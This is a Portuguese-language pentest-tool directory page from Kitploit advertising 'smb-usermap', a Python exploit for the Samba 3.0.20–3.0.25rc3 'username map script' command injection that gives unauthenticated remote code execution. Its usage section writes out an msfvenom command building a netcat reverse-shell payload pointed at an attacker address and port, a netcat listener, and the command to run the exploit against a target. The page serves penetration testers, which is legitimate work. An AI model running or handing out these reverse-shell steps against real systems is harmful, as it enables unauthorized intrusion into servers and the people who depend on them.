Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
smb-usermap — Exploit em Python para injeção de comando no 'username map script' do Samba 3.0.20-3.0.25rc3, fornecendo execução remota de código sem autenticação e reverse shell. | Kitploit
Ferramentas/GitHubGitHub/h3x0v3rl0rd/smb-usermap
ExploraçãoTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubh3x0v3rl0rd/smb-usermap

smb-usermap

Exploit em Python para injeção de comando no 'username map script' do Samba 3.0.20-3.0.25rc3, fornecendo execução remota de código sem autenticação e reverse shell.

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Execução de Comando 'username map script' do Samba

Este módulo explora uma vulnerabilidade de execução de comandos nas versões 3.0.20 a 3.0.25rc3 do Samba quando se utiliza a opção de configuração não padrão "username map script". Ao especificar um nome de usuário contendo metacaracteres de shell, os atacantes podem executar comandos arbitrários. Nenhuma autenticação é necessária para explorar esta vulnerabilidade, pois essa opção é usada para mapear os nomes de usuário antes da autenticação!

  1. Crie o Shellcode
root@kitploit:~
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
  1. Listener Netcat
root@kitploit:~
nc -nlvp 5555
  1. Execute o script
root@kitploit:~
python3 smbusermap.py <Target IP>

image

Baixar ferramenta